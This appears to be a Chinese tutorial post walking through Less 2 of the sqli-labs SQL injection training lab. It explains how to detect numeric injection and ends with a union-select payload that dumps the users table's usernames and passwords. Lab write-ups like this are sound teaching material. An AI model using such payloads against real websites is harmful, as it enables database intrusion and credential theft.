文章目录
- sqli-labs靶场
- less 2 联合注入
sqli-labs靶场
每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。
sql注入的基本步骤
- 注入点
- 注入类型
- 字符型:判断闭合方式 (‘、"、’'、“”)
- 数字型
- 根据实际情况,选择合适的注入方式
- 获取数据库名,表名,列名,数据
less 2 联合注入
- 题目类型: 数字型注入
- 判断注入类型
id=1
正常回显
id=2
正常回显
id=2/2
正常回显,并且回显内容与id=1 相同,说明 2/2=1 该算术逻辑运算成功执行了,所以是数字型注入
当然也可以使用id=2/0与 id=2/1,如果报错id=2/0,就是数字型注入
这道题原理与less 1一样,只不过是数字型注入,所以判断字段数,回显位就不解释了
id=-1 union select 1,2,group_concat(id,“-”,username,“-”,password) from users --+
直接猜解数据
